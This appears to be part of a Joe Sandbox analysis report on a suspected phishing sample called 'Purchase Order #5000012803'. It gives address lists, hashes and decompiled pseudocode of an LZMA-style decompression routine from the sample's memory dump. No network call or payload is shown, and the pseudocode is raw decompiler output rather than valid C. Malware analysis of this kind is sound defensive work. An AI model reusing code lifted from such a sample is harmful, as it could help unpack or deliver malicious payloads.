                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8
                      0x00000000
                      0x0040640d

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                      • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                      • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                      • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
